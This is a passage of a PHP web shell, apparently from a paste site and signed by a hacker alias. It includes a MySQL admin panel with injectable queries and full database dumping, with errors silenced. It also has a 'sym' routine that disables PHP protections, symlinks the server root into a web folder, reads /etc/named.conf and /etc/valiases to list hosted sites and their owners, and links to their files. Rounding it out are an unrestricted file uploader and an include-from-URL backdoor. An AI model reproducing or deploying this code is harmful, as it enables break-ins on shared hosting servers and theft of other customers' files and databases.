- echo "<select name=$fieldname size=4 multiple>\n";
- while( $str = strtok( "'" ) ) {
- echo "<option>$str\n";
- strtok( "'" );
- }
- echo "</select>\n";
- echo "</td>\n";
- } else {
- if( $len < 40 )
- echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
- else
- echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
- }
- } else if( $cmd == "edit" ) {
- $type = strtok( $fieldtype, " (,)\n" );
- if( $type == "enum" || $type == "set" ) {
- echo "<td>\n";
- if( $type == "enum" )
- echo "<select name=$fieldname>\n";
- else if( $type == "set" )
- echo "<select name=$fieldname size=4 multiple>\n";
- while( $str = strtok( "'" ) ) {
- if( $value == $str )
- echo "<option selected>$str\n";
- else
- echo "<option>$str\n";
- strtok( "'" );
- }
- echo "</select>\n";
- echo "</td>\n";
- } else {
- if( $len < 40 )
- echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
- else
- echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
- }
- }
- echo "</tr>";
- }
- echo "</table><p>\n";
- if( $cmd == "add" )
- echo "<input type=submit value='Tambah Data'>\n";
- else if( $cmd == "edit" )
- echo "<input type=submit value='Edit Data'>\n";
- echo "<input type=button value='Cancel' onClick='history.back()'>\n";
- echo "</form>\n";
- }
- function manageData_submit( $cmd ) {
- global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
- $pResult = mysql_list_fields( $dbname, $tablename );
- $num = mysql_num_fields( $pResult );
- mysql_select_db( $dbname, $mysqlHandle );
- if( $cmd == "add" )
- $queryStr = "INSERT INTO $tablename VALUES (";
- else if( $cmd == "edit" )
- $queryStr = "REPLACE INTO $tablename VALUES (";
- for( $i = 0; $i < $num-1; $i++ ) {
- $field = mysql_fetch_field( $pResult );
- $func = $GLOBALS[$field->name."_function"];
- if( $func != "" )
- $queryStr .= " $func(";
- if( $field->numeric == 1 ) {
- $queryStr .= $GLOBALS[$field->name];
- if( $func != "" )
- $queryStr .= "),";
- else
- $queryStr .= ",";
- } else {
- $queryStr .= "'" . $GLOBALS[$field->name];
- if( $func != "" )
- $queryStr .= "'),";
- else
- $queryStr .= "',";
- }
- }
- $field = mysql_fetch_field( $pResult );
- if( $field->numeric == 1 )
- $queryStr .= $GLOBALS[$field->name] . ")";
- else
- $queryStr .= "'" . $GLOBALS[$field->name] . "')";
- mysql_query( $queryStr , $mysqlHandle );
- $errMsg = mysql_error();
- viewData( "" );
- }
- function deleteData() {
- global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
- $pResult = mysql_list_fields( $dbname, $tablename );
- $num = mysql_num_fields( $pResult );
- $key = "";
- for( $i = 0; $i < $num; $i++ ) {
- $field = mysql_fetch_field( $pResult, $i );
- if( $field->primary_key == 1 )
- if( $field->numeric == 1 )
- $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
- else
- $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
- }
- $key = substr( $key, 0, strlen($key)-4 );
- mysql_select_db( $dbname, $mysqlHandle );
- $queryStr = "DELETE FROM $tablename WHERE $key";
- mysql_query( $queryStr, $mysqlHandle );
- $errMsg = mysql_error();
- viewData( "" );
- }
- function fetch_table_dump_sql($table)
- {
- global $mysqlHandle,$dbname;
- mysql_select_db( $dbname, $mysqlHandle );
- $query_id = mysql_query("SHOW CREATE TABLE $table",$mysqlHandle);
- $tabledump = mysql_fetch_array($query_id, MYSQL_ASSOC);
- $tabledump = "DROP TABLE IF EXISTS $table;\n" . $tabledump['Create Table'] . ";\n\n";
- echo $tabledump;
- // get data
- $rows = mysql_query("SELECT * FROM $table",$mysqlHandle);
- $numfields=mysql_num_fields($rows);
- while ($row = mysql_fetch_array($rows, MYSQL_NUM))
- {
- $tabledump = "INSERT INTO $table VALUES(";
- $fieldcounter = -1;
- $firstfield = 1;
- // get each field's data
- while (++$fieldcounter < $numfields)
- {
- if (!$firstfield)
- {
- $tabledump .= ', ';
- }
- else
- {
- $firstfield = 0;
- }
- if (!isset($row["$fieldcounter"]))
- {
- $tabledump .= 'NULL';
- }
- else
- {
- $tabledump .= "'" . mysql_escape_string($row["$fieldcounter"]) . "'";
- }
- }
- $tabledump .= ");\n";
- echo $tabledump;
- }
- @mysql_free_result($rows);
- }
- function dump() {
- global $mysqlHandle, $sql, $dbname, $tablename;
- if( $sql == "dumpTable" ){
- header("Content-disposition: filename=$tablename.sql");
- header('Content-type: unknown/unknown');
- fetch_table_dump_sql($tablename);
- echo "\n\n\n";
- echo "\r\n\r\n\r\n### $tablename TABLE DUMP COMPLETED ###";
- exit;
- }else{
- header("Content-disposition: filename=$dbname.sql");
- header('Content-type: unknown/unknown');
- mysql_select_db( $dbname, $mysqlHandle );
- $query_id = mysql_query("SHOW tables",$mysqlHandle);
- while ($row = mysql_fetch_array($query_id, MYSQL_NUM))
- {
- fetch_table_dump_sql($row[0]);
- echo "\n\n\n";
- echo "\r\n\r\n\r\n### $row[0] TABLE DUMP COMPLETED ###";
- echo "\n\n\n";
- }
- echo "\r\n\r\n\r\n### $dbname DATABASE DUMP COMPLETED ###";
- exit;
- }
- }
- function utils() {
- global $PHP_SELF, $command;
- echo "<h2>Utilities</h2>\n";
- if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
- echo "<hr>\n";
- echo "Show\n";
- echo "<ul>\n";
- echo "<li><a href='$PHP_SELF?sql=utils&command=show_status'>Status</a>\n";
- echo "<li><a href='$PHP_SELF?sql=utils&command=show_variables'>Variables</a>\n";
- echo "<li><a href='$PHP_SELF?sql=utils&command=show_processlist'>Processlist</a>\n";
- echo "</ul>\n";
- echo "Flush\n";
- echo "<ul>\n";
- echo "<li><a href='$PHP_SELF?sql=utils&command=flush_hosts'>Hosts</a>\n";
- if( $command == "flush_hosts" ) {
- if( mysql_query( "Flush hosts" ) != false )
- echo "<font size=2 color=red>- Success</font>";
- else
- echo "<font size=2 color=red>- Fail</font>";
- }
- echo "<li><a href='$PHP_SELF?sql=utils&command=flush_logs'>Logs</a>\n";
- if( $command == "flush_logs" ) {
- if( mysql_query( "Flush logs" ) != false )
- echo "<font size=2 color=red>- Success</font>";
- else
- echo "<font size=2 color=red>- Fail</font>";
- }
- echo "<li><a href='$PHP_SELF?sql=utils&command=flush_privileges'>Privileges</a>\n";
- if( $command == "flush_privileges" ) {
- if( mysql_query( "Flush privileges" ) != false )
- echo "<font size=2 color=red>- Success</font>";
- else
- echo "<font size=2 color=red>- Fail</font>";
- }
- echo "<li><a href='$PHP_SELF?sql=utils&command=flush_tables'>Tables</a>\n";
- if( $command == "flush_tables" ) {
- if( mysql_query( "Flush tables" ) != false )
- echo "<font size=2 color=red>- Success</font>";
- else
- echo "<font size=2 color=red>- Fail</font>";
- }
- echo "<li><a href='$PHP_SELF?sql=utils&command=flush_status'>Status</a>\n";
- if( $command == "flush_status" ) {
- if( mysql_query( "Flush status" ) != false )
- echo "<font size=2 color=red>- Success</font>";
- else
- echo "<font size=2 color=red>- Fail</font>";
- }
- echo "</ul>\n";
- } else {
- $queryStr = ereg_replace( "_", " ", $command );
- $pResult = mysql_query( $queryStr );
- if( $pResult == false ) {
- echo "Fail";
- return;
- }
- $col = mysql_num_fields( $pResult );
- echo "<p class=location>$queryStr</p>\n";
- echo "<hr>\n";
- echo "<table border=0>\n";
- echo "<tr>\n";
- for( $i = 0; $i < $col; $i++ ) {
- $field = mysql_fetch_field( $pResult, $i );
- echo "<th>".$field->name."</th>\n";
- }
- echo "</tr>\n";
- while( 1 ) {
- $rowArray = mysql_fetch_row( $pResult );
- if( $rowArray == false ) break;
- echo "<tr>\n";
- for( $j = 0; $j < $col; $j++ )
- echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
- echo "</tr>\n";
- }
- echo "</table>\n";
- }
- }
- function header_html() {
- global $PHP_SELF;
- echo '
- <html>
- <head>
- <title>Login To Database</title>
- <style>p.location { color: black; }
- table, th, td ( border:1px solid green; border-collapse:collapse; )
- th:hover { border:1px solid red; }
- hr { color:green; background-color:green; }</style>
- </head>
- <body>
- ';
- }
- function footer_html() {
- global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
- echo "<hr>\n";
- echo "<font size=2 color=blue>[$USERNAME]</font> - \n";
- echo "<a href='$PHP_SELF?sql=listDBs'>Database List</a> | \n";
- if( $tablename != "" )
- echo "<a href='$PHP_SELF?sql=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
- echo "<a href='$PHP_SELF?sql=utils'>Utils</a> |\n";
- echo "<a href='$PHP_SELF?sql=logout'>Logout</a>\n";
- echo "</font>\n";
- echo "</body>\n";
- echo "</html>\n";
- }
- //------------- MAIN ------------- //
- error_reporting(0);
- ini_set ('display_errors', 0);
- ini_set ('log_errors', 0);
- if( $sql == "logon" || $sql == "" || $sql == "logout" )
- logon();
- else if( $sql == "logon_submit" )
- logon_submit();
- else if( $sql == "dumpTable" || $sql == "dumpDB" ) {
- while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
- if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
- if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
- if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
- }
- $mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
- dump();
- } else {
- while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
- if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
- if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
- if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
- }
- echo "<!--";
- $mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
- echo "-->";
- if( $mysqlHandle == false ) {
- echo "<html>\n";
- echo "<head>\n";
- echo "<title>Login To Database</title>\n";
- echo "</head>\n";
- echo "<body>\n";
- echo "<table width=100% height=100%><tr><td><center>\n";
- echo "<h2>Incorrect Password/Username</h2>\n";
- echo "<a href='$PHP_SELF?sql=logon'>..Try Again..</a>\n";
- echo "</center></td></tr></table>\n";
- echo "</body>\n";
- echo "</html>\n";
- } else {
- header_html();
- if( $sql == "listDBs" )
- listDatabases();
- else if( $sql == "createDB" )
- createDatabase();
- else if( $sql == "dropDB" )
- dropDatabase();
- else if( $sql == "listTables" )
- listTables();
- else if( $sql == "createTable" )
- createTable();
- else if( $sql == "dropTable" )
- dropTable();
- else if( $sql == "viewSchema" )
- viewSchema();
- else if( $sql == "query" )
- viewData( $queryStr );
- else if( $sql == "addField" )
- manageField( "add" );
- else if( $sql == "addField_submit" )
- manageField_submit( "add" );
- else if( $sql == "editField" )
- manageField( "edit" );
- else if( $sql == "editField_submit" )
- manageField_submit( "edit" );
- else if( $sql == "dropField" )
- dropField();
- else if( $sql == "viewData" )
- viewData( "" );
- else if( $sql == "addData" )
- manageData( "add" );
- else if( $sql == "addData_submit" )
- manageData_submit( "add" );
- else if( $sql == "editData" )
- manageData( "edit" );
- else if( $sql == "editData_submit" )
- manageData_submit( "edit" );
- else if( $sql == "deleteData" )
- deleteData();
- else if( $sql == "utils" )
- utils();
- mysql_close( $mysqlHandle);
- footer_html();
- }
- }
- echo '</div>';
- }
- if(isset($_REQUEST['sym']))
- {
- @mkdir('AKP', 0777);
- $pini2='disbale_functions=none';
- $phpini2=@fopen('php.ini');
- fwrite($phpini2, $pini2);
- $pini='<?
- echo ini_get("safe_mode");
- echo ini_get("open_basedir");
- include($_GET["file"]);
- ini_restore("open_basedir");
- echo ini_get("safe_mode");
- echo ini_get("open_basedir");
- include($_GET["ss"]);
- ?>';
- $phpini=@fopen('/AKP/php.ini','w') or die('<script>alert("r00t@AKP:~# Direcory is Not Writable!!!")</script>') ;
- fwrite($phpini, $pini);
- $hta="Options all\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nRequire None\nSatisfy Any";
- $htaccess=@fopen('AKP/.htaccess', 'w');
- fwrite($htaccess, $hta);
- @symlink("/", "AKP/root");
- $akps=@file("/etc/named.conf");
- if(!$akps)
- {
- die('<script>alert("r00t@AKP:~# /etc/named.conf Not Found!!!")</script>');
- }
- echo "<div class=container><br /><font size=4>[+] Total Domanis Found: </font><font color=red>".count($akps)."</font><br /><br /><table align=center border=1 width=59% cellpadding=5><tr><td>Domains</td><td>Users</td><td>Exploit</font></td></tr>";
- foreach($akps as $akp)
- {
- if(eregi("zone", $akp))
- {
- preg_match_all('#zone "(.*)" #', $akp, $akpzz);
- flush();
- if(strlen(trim($akpzz[1][0]))>2)
- {
- $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
- echo "<tr><td><a href=http://www.".$akpzz[1][0]." target=_blank>".$akpzz[1][0]."</a><td>".$user['name']."
- </td><td><a href=/AKP/root/home/".$user['name']."/public_html/ target=_blank>SymLink</a></td></tr>";
- flush();
- }
- }
- }
- echo '</table></div>';
- }
- if(isset($_REQUEST['upload']))
- {
- echo '<div class=container><p><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
- echo 'UpLoad FilE $ <input type="file" name="file" size="66">
- <input name="_upl" type="submit" id="_upl" value=">>"></form></p>';
- if ($_POST['_upl']==">>") {
- if (@copy($_FILES['file']['tmp_name'], $_FILES['file'] ['name']))
- {
- echo '<SCRIPT>alert("[V] UpLOad Success")</script>';
- }
- else {
- echo '<SCRIPT>alert("[X] UpLOad FaiLed!!!")</script>';
- }
- }
- echo '</div>';
- }
- if(isset($_REQUEST['about']))
- {
- echo "<div class=container><p>Greets To<br />TOF members:~# Coded32, Null Void, Alex, Evis, Ankit, x-hund & All unknowns<br />Amsteck Arts&Science College:~# BCA-Dheeraj, Ashwin, Arjun, Vipin & Anuprasad<br />
- BSc-Jhelai & Jitendra<br />--[[<font color=red>By Ajith Kp aka 0x4j17#</font>]]--</p></div>";
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement